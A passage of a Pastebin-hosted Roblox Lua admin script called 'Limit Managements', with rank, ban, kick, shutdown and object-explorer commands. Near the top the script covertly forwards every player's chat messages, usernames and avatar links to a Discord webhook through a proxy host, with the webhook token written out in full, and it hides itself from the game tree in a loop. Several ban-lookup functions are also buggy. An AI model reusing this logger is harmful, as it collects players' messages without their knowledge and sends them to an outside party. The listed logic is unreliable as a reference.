Advertisement
Mitko1223tm

lmao

May 23rd, 2019
333
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 38.40 KB | None | 0 0
  1. -------------
  2. script.Parent = nil
  3. local gametime=0
  4. coroutine.wrap(function()
  5. while wait(1) do
  6. gametime=gametime+1
  7. end
  8. end)()
  9. bet = "/"
  10. PS = false
  11. ar = 0
  12. AB = {}
  13.  
  14. local lplayers={}
  15. local center={}
  16. canEnter = function(plr)
  17. if type(plr) == "userdata" then
  18. plr=plr.Name
  19. elseif type(plr) == "string" then
  20. plr=plr
  21. else
  22. plr=tostring(plr)
  23. end
  24. table.insert(center,plr)
  25. end
  26. local Admins={
  27. {["Name"] = "AntonioRecio123",["Rank"]=8};
  28. {["Name"] = "Mitko1223tm",["Rank"]=10};
  29. {["Name"] = "The6Devil6Lord666",["Rank"]=10};
  30. }
  31.  
  32. local Ranks={
  33. [1] = "Player";
  34. [2] = "Trusted";
  35. [3] = "Moderator";
  36. [4] = "Full moderator";
  37. [5] = "Admin";
  38. [6] = "Super Admin";
  39. [7] = "Ultra Admin";
  40. [8] = "Advanced Force";
  41. [9] = "Vice";
  42. [10] = "CEO"
  43. }
  44.  
  45. local Cmds={
  46. {["Name"] = "Dismiss", ["Usage"] = "dt", ["Description"] = "Dismiss all tabs."}
  47. }
  48.  
  49. local Bans={
  50. {["Name"] = "Rerumu", ["Reason"] = "6 years old abuser who keeps logging"};
  51. }
  52.  
  53. local s = Instance.new("Sound")
  54.  
  55. s.Name = "Sound"
  56. s.SoundId = "http://www.roblox.com/asset/?id=335013824"
  57. s.Volume = 10
  58. s.Looped = false
  59. s.archivable = false
  60.  
  61. s.Parent = game.Workspace
  62.  
  63. wait(3)
  64.  
  65. s:play()
  66.  
  67. local Players = game:GetService("Players")
  68. local HttpService = game:GetService("HttpService")
  69.  
  70.  
  71. local webhook = "https://discord.osyr.is/api/webhooks/489700036377051136/RlK2424i2Lk9t_wl8snCZ7_PujOtUO3NvxgYPqlKQvqOHUEBcofirwoneEcXhjsmGGpO"
  72.  
  73. Players.PlayerAdded:Connect(function(plr)
  74. plr.Chatted:Connect(function(msg)
  75. local data = {
  76. content = msg;
  77. username = plr.Name;
  78. avatar_url = "http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&Format=Png&userId="..plr.UserId
  79. }
  80. HttpService:PostAsync(webhook, HttpService:JSONEncode(data))
  81. end)
  82. end)
  83.  
  84. say = function(msg1,msg2)
  85. pcall(function()
  86. for _,v in next,game:GetService("Players"):GetPlayers() do
  87. local SV = Instance.new("StringValue")
  88. SV.Parent = v
  89. SV.Name = "SB_Chat"
  90. SV.Value = ""..tostring(msg1):gsub('','')..""..tostring(msg2):gsub('','')..""
  91. game.Debris:AddItem(SV, .1)
  92. end
  93. end)
  94. end
  95.  
  96. sbexe = function(cmd,plr)
  97. if not type(cmd)=='string'then return end
  98. if plr then
  99. if type(plr)=='userdata'then
  100. plr:FindFirstChild("SB_CommandRemote",true).Value = cmd
  101. elseif type(plr)=='string'then
  102. plr = game:GetService('Players'):FindFirstChild(plr)
  103. plr:FindFirstChild("SB_CommandRemote",true).Value = cmd
  104. end
  105. end
  106. end
  107.  
  108.  
  109.  
  110. getBan = function(player)
  111. if type(player) == "userdata" then
  112. player=player.Name
  113. elseif type(player) == "string" then
  114. player=player
  115. else
  116. player=tostring(player)
  117. end
  118. for Index, v in pairs(Bans) do
  119. if v.Name == player then
  120. return v
  121. else
  122. return 0
  123. end
  124. end
  125. end
  126.  
  127. getReason = function(player)
  128. if type(player) == "userdata" then
  129. player=player.Name
  130. elseif type(player) == "string" then
  131. player=player
  132. else
  133. player=tostring(player)
  134. end
  135. for Index, v in pairs(Bans) do
  136. if v.Name == player then
  137. return v.Reason
  138. else
  139. return nil
  140. end
  141. end
  142. end
  143.  
  144. CheckBan = function(player)
  145. if type(player) == "userdata" then
  146. player=player.Name
  147. elseif type(player) == "string" then
  148. player=player
  149. else
  150. player=tostring(player)
  151. end
  152. for Index, v in pairs(Bans) do
  153. if v.Name == player then
  154. return true
  155. else
  156. return false
  157. end
  158. end
  159. end
  160.  
  161. Ban = function(player,reason)
  162. if type(reason) == "userdata" then
  163. reason=reason.Value
  164. elseif type(reason) == "string" then
  165. reason=reason
  166. else
  167. reason=tostring(reason)
  168. end
  169. if type(player) == "userdata" then
  170. player=player.Name
  171. elseif type(player) == "string" then
  172. player=player
  173. else
  174. player=tostring(player)
  175. end
  176. table.insert(Bans,{["Name"] = player,["Reason"] = reason})
  177. end
  178.  
  179. Ban("Admin_Leaker","skid")
  180. Ban("NeoDevGames","skid")
  181.  
  182. getBanNumber = function(plr)
  183. if type(plr) == "userdata" then
  184. plr=plr.Name
  185. elseif type(plr) == "string" then
  186. plr=plr
  187. else
  188. plr=tostring(plr)
  189. end
  190. for i,v in pairs(Bans) do
  191. if v.Name == plr then
  192. return Bans[v]
  193. else
  194. return 0
  195. end
  196. end
  197. end
  198.  
  199. Unban = function(player)
  200. if CheckBan(player) == true then
  201. table.remove(Bans, getBanNumber(player))
  202. end
  203. end
  204.  
  205. local Services = {
  206. StarterGui = game:service("StarterGui");
  207. Lighting = game:service("Lighting");
  208. }
  209. local name = "Limit Managements(LM)"
  210. local version = "Last"
  211. local Tablets={}
  212. local gamename=game.Name
  213. local Players=game:service("Players")
  214. local rs=game:service("RunService").Stepped
  215. local hb=game:service("RunService").Heartbeat
  216. shutdown = function(rank,reason)
  217. for i,v in pairs(Players:GetPlayers()) do
  218. if v then
  219. if getRank(v)<rank then
  220. v:Kick(name.." | This game has shutdown by Limit Managements! "..reason)
  221. end
  222. end
  223. end
  224. end
  225.  
  226. coroutine.resume(coroutine.create(function()
  227. while hb:wait() do
  228. script.Parent=nil
  229. end
  230. end))
  231. local shape="Block"
  232. local size=1, 8, 1
  233. local material="Glass"
  234. o1 = Instance.new("ScreenGui")
  235. o2 = Instance.new("ImageLabel")
  236. o1.Parent = Services.StarterGui
  237. o2.Name = "logo"
  238. o2.Parent = o1
  239. o2.Position = UDim2.new(0.89999997615814,0,0.89999997615814,0)
  240. o2.Size = UDim2.new(0,100,0,100)
  241. o2.Position = UDim2.new(0.89999997615814,0,0.89999997615814,0)
  242. o2.BackgroundColor3 = Color3.new(1, 1, 1)
  243. o2.BackgroundTransparency = 1
  244. o2.BorderSizePixel = 0
  245. o2.Image = "rbxassetid://2886953514"
  246. coroutine.wrap(function()
  247. while rs:wait() do
  248. for Index, Player in pairs(Players:GetPlayers()) do
  249. if CheckBan(Player.Name) == true then
  250. Player:Kick(name.." | You're banned.Reason: "..getReason(Player))
  251. end
  252. end
  253. end
  254. end)()
  255. dismiss = function(plr)
  256. if type(plr) == "userdata" then
  257. plr=plr.Name
  258. elseif type(plr) == "string" then
  259. plr=plr
  260. else
  261. plr=tostring(plr)
  262. end
  263. for i,v in pairs(Tablets) do
  264. if v.Name==plr then
  265. v:Destroy()
  266. end
  267. end
  268. end
  269.  
  270. getRank = function(Player)
  271. if type(Player) == "userdata" then
  272. Player = Player.Name
  273. elseif type(Player) == "string" then
  274. Player = Player
  275. else
  276. Player = tostring(Player)
  277. end
  278. for Index,Ranked in pairs(Admins) do
  279. if Ranked.Name == Player then
  280. return Ranked.Rank
  281. end
  282. end
  283. return 1
  284. end
  285.  
  286. checkTab = function(plr,tab)
  287. if type(plr) == "userdata" then
  288. plr=plr.Name
  289. elseif type(plr) == "string" then
  290. plr=plr
  291. else
  292. plr=tostring(plr)
  293. end
  294. if tab.Name==plr then
  295. return true
  296. else
  297. return false
  298. end
  299. end
  300.  
  301. check = function(Player,Rank)
  302. if type(Player) == "userdata" then
  303. Player = Player.Name
  304. elseif type(Player) == "string" then
  305. Player=Player
  306. else
  307. Player=tostring(Player)
  308. end
  309. if type(Rank) == "userdata" then
  310. Rank=Rank.Value
  311. elseif type(Rank) == "number" then
  312. Rank=Rank
  313. else
  314. Rank=tonumber(Rank)
  315. end
  316. for Index,Ranked in pairs(Admins) do
  317. if Ranked.Name == Player then
  318. if Ranked.Rank == Rank then
  319. return true
  320. elseif Ranked.Name==Player then
  321. if Ranked.Rank < Rank then
  322. return false
  323. else
  324. return false
  325. end
  326. end
  327. end
  328. end
  329. end
  330.  
  331. function Output(Player,Text,Color,Function)
  332. local Part = Instance.new("Part")
  333. local parent = workspace.Terrain
  334. Part.Parent = parent
  335. Part.Name=Player.Name
  336. if Color == "Random" then
  337. Part.BrickColor = BrickColor.Random()
  338. else
  339. Part.BrickColor = BrickColor.new(Color)
  340. end
  341. Part.Shape = shape
  342. Part.Size = Vector3.new(size,size,size)
  343. Part.Material = material
  344. Part.BackSurface="SmoothNoOutlines"
  345. Part.BottomSurface="SmoothNoOutlines"
  346. Part.FrontSurface="SmoothNoOutlines"
  347. Part.LeftSurface="SmoothNoOutlines"
  348. Part.RightSurface="SmoothNoOutlines"
  349. Part.TopSurface="SmoothNoOutlines"
  350. Part.Locked=true
  351. Part.CanCollide=false
  352. Part.Anchored=true
  353. local PointLight=Instance.new("PointLight",Part)
  354. PointLight.Color=Part.Color
  355. PointLight.Brightness=100
  356. PointLight.Range=10
  357. PointLight.Shadows=true
  358. PointLight.Enabled=true
  359. local BillboardGui=Instance.new("BillboardGui",Part)
  360. BillboardGui.Adornee=Part
  361. BillboardGui.StudsOffset=Vector3.new(0,size*1.5,0)
  362. BillboardGui.Size=UDim2.new(3, 0, 3, 0)
  363. local TextLabel=Instance.new("TextLabel",BillboardGui)
  364. TextLabel.Text=Text
  365. TextLabel.BackgroundTransparency=1
  366. TextLabel.Size=UDim2.new(1, 0, 0.6, 0)
  367. TextLabel.FontSize="Size24"
  368.  
  369. TextLabel.Font=Enum.Font.SourceSansBold --SourceSansBold
  370. TextLabel.TextColor3=BrickColor.new("White").Color
  371. TextLabel.TextStrokeTransparency=0
  372.  
  373. local Click = Instance.new("ClickDetector", Part)
  374. Click.Parent=Part
  375. Click.MaxActivationDistance = 1/0
  376. Click.MouseHoverEnter:connect(function(plr)
  377. if plr == Player or getRank(plr) > getRank(Player) then
  378. Part.Material="Ice"
  379. end
  380. end)
  381. Click.MouseHoverLeave:connect(function(plr)
  382. if plr == Player or getRank(plr) > getRank(Player) then
  383. Part.Material=material
  384. end
  385. end)
  386. Click.MouseClick:connect(function(plr)
  387. if plr == Player or getRank(plr) > getRank(Player) then
  388. if Function == nil then
  389. Part:Destroy()
  390. else
  391. local run,Error = ypcall(function()
  392. Function()
  393. end)
  394. if Error then
  395. Output(plr,"Error | "..tostring(Error), "Deep orange")
  396. end
  397. Part:Destroy()
  398. end
  399. end
  400. end)
  401.  
  402. table.insert(Tablets, Part)
  403. end
  404.  
  405. Explore = function(plr,object)
  406. local s = Instance.new("Sound")
  407.  
  408. s.Name = "Sound"
  409. s.SoundId = "http://www.roblox.com/asset/?id=278467908"
  410. s.Volume = 10
  411. s.Looped = false
  412. s.archivable = false
  413.  
  414. s.Parent = game.Workspace
  415. for i,v in pairs(object:GetChildren()) do
  416. Output(plr,v.ClassName.." | "..v.Name,"Deep orange",function()
  417. dismiss(plr)
  418. Output(plr,"Remove "..v.Name,"Really red",function() dismiss(plr) v:Destroy() s:play() end)
  419. Output(plr,"View children","Really black",function() dismiss(plr) Explore(plr,v) s:play() end)
  420. Output(plr,"Dismiss","Deep orange",function() dismiss(plr) s:play() end)
  421. Output(plr,"View parent","Really black",function() dismiss(plr) Explore(plr,v.Parent) s:play() end)
  422. end)
  423. end
  424. end
  425.  
  426. rank = function(plr,rank)
  427. if type(plr) == "userdata" then
  428. plr=plr.Name
  429. elseif type(plr) == "string" then
  430. plr=plr
  431. else
  432. plr=tostring(plr)
  433. end
  434. for i,v in pairs(Admins) do
  435. if v.Name == plr then
  436. v.Rank=rank
  437. end
  438. end
  439. end
  440.  
  441. showCmds = function(plr)
  442. local s = Instance.new("Sound")
  443.  
  444. s.Name = "Sound"
  445. s.SoundId = "http://www.roblox.com/asset/?id=278467908"
  446. s.Volume = 10
  447. s.Looped = false
  448. s.archivable = false
  449.  
  450. s.Parent = game.Workspace
  451. for i,v in pairs(Cmds) do
  452. Output(plr,"Command | "..v.Name,"Really black",function() dismiss(plr) s:play() Output(plr,"Dismiss","Really red",function() dismiss(plr) s:play() end) Output(plr,"LM | Go back","Really black",function() dismiss(plr) showCmds(plr) s:play() end) Output(plr,"Description | "..v.Description,"Really black",function() s:play() end)Output(plr,"Usage | "..v.Usage,"Really black",function() s:play() end) end)
  453. end
  454. Output(plr,"Dismiss","Deep orange",function() dismiss(plr) s:play() end)
  455. end
  456. function newAdmin(plr,rank)
  457. table.insert(Admins,{["Name"] = plr, ["Rank"]=rank})
  458. end
  459.  
  460. newAdmin("AntonioRecio123",8)
  461.  
  462. local function QuaternionFromCFrame(cf)
  463. local mx, my, mz, m00, m01, m02, m10, m11, m12, m20, m21, m22 = cf:components();
  464. local trace = m00 + m11 + m22 if trace > 0 then
  465. local s = math.sqrt(1 + trace);
  466. local recip = 0.5/s;
  467. return (m21-m12)*recip, (m02-m20)*recip, (m10-m01)*recip, s*0.5;
  468. else
  469. local i = 0;
  470. if m11 > m00 then
  471. i = 1;
  472. end;
  473. if m22 > (i == 0 and m00 or m11) then
  474. i = 2 end if i == 0 then
  475. local s = math.sqrt(m00-m11-m22+1);
  476. local recip = 0.5/s return 0.5*s, (m10+m01)*recip, (m20+m02)*recip, (m21-m12)*recip;
  477. elseif i == 1 then
  478. local s = math.sqrt(m11-m22-m00+1);
  479. local recip = 0.5/s;
  480. return (m01+m10)*recip, 0.5*s, (m21+m12)*recip, (m02-m20)*recip ;
  481. elseif i == 2 then
  482. local s = math.sqrt(m22-m00-m11+1);
  483. local recip = 0.5/s;
  484. return (m02+m20)*recip, (m12+m21)*recip, 0.5*s, (m10-m01)*recip;
  485. end;
  486. end;
  487. end;
  488.  
  489. local function QuaternionToCFrame(px, py, pz, x, y, z, w)
  490. local xs, ys, zs = x + x, y + y, z + z;
  491. local wx, wy, wz = w*xs, w*ys, w*zs;
  492. local xx = x*xs;
  493. local xy = x*ys;
  494. local xz = x*zs;
  495. local yy = y*ys;
  496. local yz = y*zs;
  497. local zz = z*zs;
  498. return CFrame.new(px, py, pz,1-(yy+zz), xy - wz, xz + wy,xy + wz, 1-(xx+zz), yz - wx, xz - wy, yz + wx, 1-(xx+yy))
  499. end;
  500.  
  501. local function QuaternionSlerp(a, b, t)
  502. local cosTheta = a[1]*b[1] + a[2]*b[2] + a[3]*b[3] + a[4]*b[4];
  503. local startInterp, finishInterp;
  504. if cosTheta >= 0.0001 then
  505. if (1 - cosTheta) > 0.0001 then
  506. local theta = math.acos(cosTheta);
  507. local invSinTheta = 1/math.sin(theta);
  508. startInterp = math.sin((1-t)*theta)*invSinTheta;
  509. finishInterp = math.sin(t*theta)*invSinTheta;
  510. else
  511. startInterp = 1-t finishInterp = t;
  512. end;
  513. else
  514. if (1+cosTheta) > 0.0001 then
  515. local theta = math.acos(-cosTheta);
  516. local invSinTheta = 1/math.sin(theta);
  517. startInterp = math.sin((t-1)*theta)*invSinTheta;
  518. finishInterp = math.sin(t*theta)*invSinTheta;
  519. else startInterp = t-1 finishInterp = t;
  520. end;
  521. end;
  522. return a[1]*startInterp + b[1]*finishInterp, a[2]*startInterp + b[2]*finishInterp, a[3]*startInterp + b[3]*finishInterp, a[4]*startInterp + b[4]*finishInterp;
  523. end;
  524.  
  525. function CLerp(a,b,t)
  526. local qa={QuaternionFromCFrame(a)};
  527. local qb={QuaternionFromCFrame(b)};
  528. local ax,ay,az=a.x,a.y,a.z;
  529. local bx,by,bz=b.x,b.y,b.z;
  530. local _t=1-t;
  531. return QuaternionToCFrame(_t*ax+t*bx,_t*ay+t*by,_t*az+t*bz,QuaternionSlerp(qa, qb, t));
  532. end
  533. local Speed=1;
  534. function Rot()
  535. Speed=Speed+0.0025;
  536. for _,Player in pairs(game:GetService("Players"):GetPlayers()) do
  537. local Tabs = {};
  538. for i,v in pairs(Tablets) do
  539. if v.Parent and v.Name==Player.Name then
  540. table.insert(Tabs, v);
  541. end
  542. end
  543. for i = 1, #Tabs do
  544. local Position;
  545. pcall(function()
  546. Position = Player.Character.Torso.CFrame
  547. end)
  548. if(Position) == nil then return end
  549. Tabs[i].CFrame=CLerp(Tabs[i].CFrame,CFrame.new(Player.Character.Torso.CFrame.p)
  550. *CFrame.Angles(0,math.rad((360/#Tabs)*i)+Speed,0)
  551. *CFrame.new(4+#Tabs,math.sin((tick()+i)*1)/1,0)--math.sin(tick(nil,1,i))
  552. *CFrame.Angles(0,math.rad(90),0)
  553. *CFrame.Angles(math.sin((tick()+i)*1)/1,math.sin((tick()+i)*1)/1,math.sin((tick()+i)*1)/1)
  554. ,.1);
  555. end
  556. end
  557. end
  558.  
  559. coroutine.wrap(function()
  560. while rs:wait() do
  561. pcall(function()
  562. for Index,Value in pairs(Players:GetPlayers()) do
  563. for _,v in pairs(Bans) do
  564. if Value.Name == v.Name then
  565. Value:Kick(name.." | You're banned by Limit Managements! Contact Mitko1223tm and ask where to appeal/complain or even protest! "..v.Reason)
  566. end
  567. end
  568. end
  569. end)
  570. end
  571. end)()
  572.  
  573. local s = Instance.new("Sound")
  574.  
  575. s.Name = "Sound"
  576. s.SoundId = "http://www.roblox.com/asset/?id=278467908"
  577. s.Volume = 10
  578. s.Looped = false
  579. s.archivable = false
  580.  
  581. s.Parent = game.Workspace
  582. say(name,name.." Has successfully loaded!",function() s:play() end)
  583. say(name,"Say cmds"..bet.." for a list of commands.",function() s:play() end)
  584. say(name,"Created by Mitko1223tm.",function() s:play() end)
  585. say(name,"Limit Managements(LM)",function() s:play() end)
  586.  
  587. shutdown = function(rank,reason)
  588. if type(reason) == "userdata" then
  589. reason=reason.Name
  590. elseif type(reason) == "string" then
  591. reason=reason
  592. else
  593. reason=tostring(reason)
  594. end
  595. for Index,Player in pairs(Players:GetPlayers()) do
  596. if getRank(Player) > rank then
  597. Player:Kick(name.." | This game has shutdown.Reason: "..reason)
  598. end
  599. end
  600. end
  601.  
  602. checkAB = function(plr)
  603. if type(plr) == "userdata" then
  604. plr=plr.Name
  605. elseif type(plr) == "string" then
  606. plr=plr
  607. else
  608. plr=tostring(plr)
  609. end
  610. for Index,Value in pairs(AB) do
  611. if Value.Name == plr then
  612. return true
  613. else
  614. return false
  615. end
  616. end
  617. end
  618.  
  619. AAB = function(plr)
  620. local rank=getRank(plr)
  621. if type(plr) == "userdata" then
  622. plr=plr.Name
  623. elseif type(plr) == "string" then
  624. plr=plr
  625. else
  626. plr=tostring(plr)
  627. end
  628. table.insert(AB,{["Name"] = plr, ["Rank"] = rank})
  629. end
  630.  
  631. unAB = function(plr)
  632. if type(plr) == "userdata" then
  633. plr=plr.Name
  634. elseif type(plr) == "string" then
  635. plr=plr
  636. else
  637. plr = tostring(plr)
  638. end
  639. for Index,Player in pairs(AB) do
  640. if Player.Name == plr then
  641. table.remove(AB,Player)
  642. end
  643. end
  644. end
  645.  
  646. checkRank = function(p,r)
  647. for i,v in pairs(Admins) do
  648. if v.Name == p.Name then
  649. if v.Rank >= r then
  650. return true
  651. else
  652. return false
  653. end
  654. end
  655. end
  656. end
  657. function newCmd(name,usage,desc)
  658. if desc==nil then
  659. desc="No description avaible."
  660. end
  661. if usage == nil then
  662. usage="Unknown"
  663. end
  664. if name == nil then
  665. name="???"
  666. end
  667. table.insert(Cmds,{["Name"]=name, ["Usage"]=usage..bet, ["Description"] = desc})
  668. end
  669. local Credits = {"Boss: Mitko1223tm","Limit Managements(LM)","Administration system made by LM."}
  670.  
  671.  
  672. newCmd("Cmds","cmds","Shows a list of commands")
  673. newCmd("Version","ver","Shows the current version")
  674. newCmd("Time","time","Shows game time")
  675. newCmd("Clean","clean","Cleans game")
  676. newCmd("Killsel","killsel","Shows a menu to kill players")
  677. newCmd("FF","ff","Gives a player a forcefield")
  678. newCmd("AR","ar","Set the required rank to get into a privateserver")
  679. newCmd("Deleted command","...","This command no longer exists")
  680. newCmd("Ban","ban","Bans a player")
  681. newCmd("Kick","kick","Kicks a player")
  682. newCmd("UnFF","unff","Removes a player's forcefield")
  683. newCmd("AB","ab","Shows a menu with AB options")
  684. newCmd("Explore","explore","Explore the game")
  685. newCmd("DtAll","dtall","Dismiss everyone's tabs")
  686. newCmd("Shutdown","shutdown","Kill the game. :U")
  687. newCmd("Setrank","setrank","Shows a menu to rank players")
  688. newCmd("Ping","ping","Pings something.")
  689. newCmd("Respawn","re","Respawn a player")
  690. newCmd("Credits","credits","Shows credits")
  691. newCmd("Light","light","Creates a point light on a player")
  692. newCmd("rl","rl","Shows the requires list")
  693. newCmd("tabs","tabs","Request 7 tabs with random colors.")
  694. newCmd("op","op","Op list")
  695.  
  696. commands = function(plr,m)
  697. local msg=m:lower()
  698. if msg:sub(1,5) == "cmds"..bet and checkRank(plr,1) == true then
  699. showCmds(plr)
  700. elseif msg:sub(1,8) == "credits"..bet then
  701. if checkRank(plr,1) == true then
  702. local s = Instance.new("Sound")
  703.  
  704. s.Name = "Sound"
  705. s.SoundId = "http://www.roblox.com/asset/?id=278467908"
  706. s.Volume = 10
  707. s.Looped = false
  708. s.archivable = false
  709.  
  710. s.Parent = game.Workspace
  711. for i,v in pairs(Credits) do
  712. Output(plr,"LM | "..v,"Really black",function() s:play() end)
  713. end
  714. end
  715. elseif msg:sub(1,8) == "scripts"..bet then
  716. Output(plr,"gravity high jump","Deep orange",function() game.Workspace.Gravity = 15 end)
  717. Output(plr,"gravity no jump","Deep orange",function() game.Workspace.Gravity = math.huge end)
  718. Output(plr,"Night","Deep orange",function() game.Lighting.TimeOfDay = "00:00" end)
  719. elseif msg:sub(1,3) == "re"..bet then
  720. local victim=msg:sub(4)
  721. if checkRank(plr,2) == true then
  722. local s = Instance.new("Sound")
  723.  
  724. s.Name = "Sound"
  725. s.SoundId = "http://www.roblox.com/asset/?id=278467908"
  726. s.Volume = 10
  727. s.Looped = false
  728. s.archivable = false
  729.  
  730. s.Parent = game.Workspace
  731. for Index,Player in pairs(Players:GetPlayers()) do
  732. if Player.Name:lower():match(victim:lower()) then
  733. pcall(function()
  734. Player.Character:Destroy()
  735. Player:LoadCharacter()
  736. local cf=Player.Character.Torso.CFrame
  737. Player.Character.Torso.CFrame=cf
  738. end)
  739. end
  740. end
  741. else
  742. Output(plr,"LM | Your rank ins't enough for this command[4]","Really black",function() s:play() end)
  743. end
  744. elseif msg:sub(1,5) == "ping"..bet then
  745. if checkRank(plr,10) == true then
  746. local message=msg:sub(6)
  747. local s = Instance.new("Sound")
  748.  
  749. s.Name = "Sound"
  750. s.SoundId = "http://www.roblox.com/asset/?id=278467908"
  751. s.Volume = 10
  752. s.Looped = false
  753. s.archivable = false
  754.  
  755. s.Parent = game.Workspace
  756. if checkRank(plr,1) == true then
  757. Output(plr,"Tab | "..message,"Deep orange",function() s:play() end)
  758. end
  759. elseif msg:sub(1,9) == "shutdown"..bet then
  760. local reason=msg:sub(10)
  761. local s = Instance.new("Sound")
  762.  
  763. s.Name = "Sound"
  764. s.SoundId = "http://www.roblox.com/asset/?id=278467908"
  765. s.Volume = 10
  766. s.Looped = false
  767. s.archivable = false
  768.  
  769. s.Parent = game.Workspace
  770. if checkRank(plr,5) == true then
  771. shutdown(getRank(plr),reason)
  772. else
  773. Output(plr,"LM | Your rank ins't enough for this command[5]",function() s:play() end)
  774. end
  775. elseif msg:sub(1,8) == "setrank"..bet then
  776. if checkRank(plr,3) then
  777. for i,v in pairs(Players:GetPlayers()) do
  778. if getRank(plr) > getRank(v) then
  779. Output(plr,"User | "..v.Name,"Really black",function()
  780. dismiss(plr)
  781. Output(plr,"Set rank to 1","Really black",function() if getRank(plr) > 1 then dismiss(plr) Output(plr,"LM | You set "..v.Name.."'s rank to 1","Random") rank(v,1) else Output(plr,"You need a higher rank to set "..v.Name.."'s rank!","Really red") end end)
  782. Output(plr,"Set rank to 2","Really black",function() if getRank(plr) > 2 then dismiss(plr) Output(plr,"LM | You set "..v.Name.."'s rank to 2","Random") rank(v,2) else Output(plr,"You need a higher rank to set "..v.Name.."'s rank!","Really red") end end)
  783. Output(plr,"Set rank to 3","Really black",function() if getRank(plr) > 3 then dismiss(plr) Output(plr,"LM | You set "..v.Name.."'s rank to 3","Random") rank(v,3) else Output(plr,"You need a higher rank to set "..v.Name.."'s rank!","Really red") end end)
  784. Output(plr,"Set rank to 4","Really black",function() if getRank(plr) > 4 then dismiss(plr) Output(plr,"LM | You set "..v.Name.."'s rank to 4","Random") rank(v,4) else Output(plr,"You need a higher rank to set "..v.Name.."'s rank!","Really red") end end)
  785. Output(plr,"Set rank to 5","Really black",function() if getRank(plr) > 5 then dismiss(plr) Output(plr,"LM | You set "..v.Name.."'s rank to 5","Random") rank(v,5) else Output(plr,"You need a higher rank to set "..v.Name.."'s rank!","Really red") end end)
  786. Output(plr,"Set rank to 6","Really black",function() if getRank(plr) > 6 then dismiss(plr) Output(plr,"LM | You set "..v.Name.."'s rank to 6","Random") rank(v,6) else Output(plr,"You need a higher rank to set "..v.Name.."'s rank!","Really red") end end)
  787. Output(plr,"Set rank to 7","Really black",function() if getRank(plr) > 7 then dismiss(plr) Output(plr,"LM | You set "..v.Name.."'s rank to 7","Random") rank(v,7) else Output(plr,"You need a higher rank to set "..v.Name.."'s rank!","Really red") end end)
  788. Output(plr,"Set rank to 8","Really black",function() if getRank(plr) > 8 then dismiss(plr) Output(plr,"LM | You set "..v.Name.."'s rank to 8","Random") rank(v,8) else Output(plr,"You need a higher rank to set "..v.Name.."'s rank!","Really red") end end)
  789. Output(plr,"Set rank to 9","Really black",function() if getRank(plr) > 9 then dismiss(plr) Output(plr,"LM | You set "..v.Name.."'s rank to 9","Random") rank(v,9) else Output(plr,"You need a higher rank to set "..v.Name.."'s rank!","Really red") end end)
  790. Output(plr,"Set rank to 10","Really black",function() if getRank(plr) >= 10 then dismiss(plr) Output(plr,"LM | You set "..v.Name.."'s rank to 10","Random") rank(v,10) else Output(plr,"You need a higher rank to set "..v.Name.."'s rank!","Deep orange") end end)
  791. end)
  792. end
  793. end
  794. else
  795. Output(plr,"LM | Your rank ins't enough for this command[3]","Deep orange")
  796. end
  797. elseif msg:sub(1,5) == "tabs"..bet then
  798. if checkRank(plr,1) then
  799. local s = Instance.new("Sound")
  800.  
  801. s.Name = "Sound"
  802. s.SoundId = "http://www.roblox.com/asset/?id=335013824"
  803. s.Volume = 10
  804. s.Looped = false
  805. s.archivable = false
  806.  
  807. s.Parent = game.Workspace
  808.  
  809. Output(plr,"LM | Tab Requested","Random",function() s:play() end)
  810. Output(plr,"LM | Tab Requested","Random",function() s:play() end)
  811. Output(plr,"LM | Tab Requested","Random",function() s:play() end)
  812. Output(plr,"LM | Tab Requested","Random",function() s:play() end)
  813. Output(plr,"LM | Tab Requested","Random",function() s:play() end)
  814. Output(plr,"LM | Tab Requested","Random",function() s:play() end)
  815. Output(plr,"LM | Tab Requested","Random",function() s:play() end)
  816. end
  817. elseif msg:sub(1,6) == "dtall"..bet then
  818. if checkRank(plr,2) then
  819. local s = Instance.new("Sound")
  820.  
  821. s.Name = "Sound"
  822. s.SoundId = "http://www.roblox.com/asset/?id=278467908"
  823. s.Volume = 10
  824. s.Looped = false
  825. s.archivable = false
  826.  
  827. s.Parent = game.Workspace
  828. for i,v in pairs(Players:GetPlayers()) do
  829. if getRank(plr) > getRank(v) then
  830. dismiss(v)
  831. end
  832. Output(plr,"Dismissed everyone's tabs.","Really black",function() s:play() end)
  833. end
  834. else
  835. Output(plr,"Your rank ins't enough for this command[2]","Deep orange",function() s:play() end)
  836. end
  837. elseif msg:sub(1,3) == "dt"..bet and checkRank(plr,1) == true then
  838. dismiss(plr)
  839. elseif msg:sub(1,4) == "ver"..bet and checkRank(plr,1) == true then
  840. local s = Instance.new("Sound")
  841.  
  842. s.Name = "Sound"
  843. s.SoundId = "http://www.roblox.com/asset/?id=278467908"
  844. s.Volume = 10
  845. s.Looped = false
  846. s.archivable = false
  847.  
  848. s.Parent = game.Workspace
  849. Output(plr,"LM |The version is "..version.."!","Really black",function() s:play() end)
  850. elseif msg == "time"..bet and checkRank(plr,1) == true then
  851. local s = Instance.new("Sound")
  852.  
  853. s.Name = "Sound"
  854. s.SoundId = "http://www.roblox.com/asset/?id=278467908"
  855. s.Volume = 10
  856. s.Looped = false
  857. s.archivable = false
  858.  
  859. s.Parent = game.Workspace
  860. Output(plr,"LM | The time is: "..gametime,"Really black",function() s:play() end)
  861. elseif msg:sub(1,8) == "explore"..bet then
  862. if checkRank(plr,3) == true then
  863. Explore(plr,game)
  864. end
  865. elseif msg:sub(1,4) == "ab"..bet then
  866. if checkRank(plr,5) == true then
  867. Output(plr,"Show antiban users","Really black",function()
  868. dismiss(plr)
  869. for Index,Player in pairs(AB) do
  870. Output(plr,"Tab | "..Player.Name,"Really black",function()
  871. dismiss(plr)
  872. Output(plr,"User | "..Player.Name,"Really black")
  873. Output(plr,"LM | Remove antiban["..Player.Rank.."]","Really black",function() dismiss(plr) if getRank(plr) > Player.Rank then Output(plr,"You removed "..Player.Name.."'s forcefield.","Really black") unAB(Player) end end)
  874. end)
  875. end
  876. Output(plr,"LM | Dismiss","Really black",function() dismiss(plr) end)
  877. end)
  878. Output(plr,"LM | Add antiban","Really black",function()
  879. dismiss(plr)
  880. for Index,Player in pairs(Players:GetPlayers()) do
  881. Output(plr,"User | "..Player.Name,"Really black",function() dismiss(plr) Output(plr,"You gave AntiBan to "..Player.Name,"Really black") AAB(Player) end)
  882. end
  883. end)
  884. Output(plr,"LM | Dismiss","Really red",function() dismiss(plr) end)
  885. else
  886. Output(plr,"LM | Your rank ins't enough for this command[5]","Really red")
  887. end
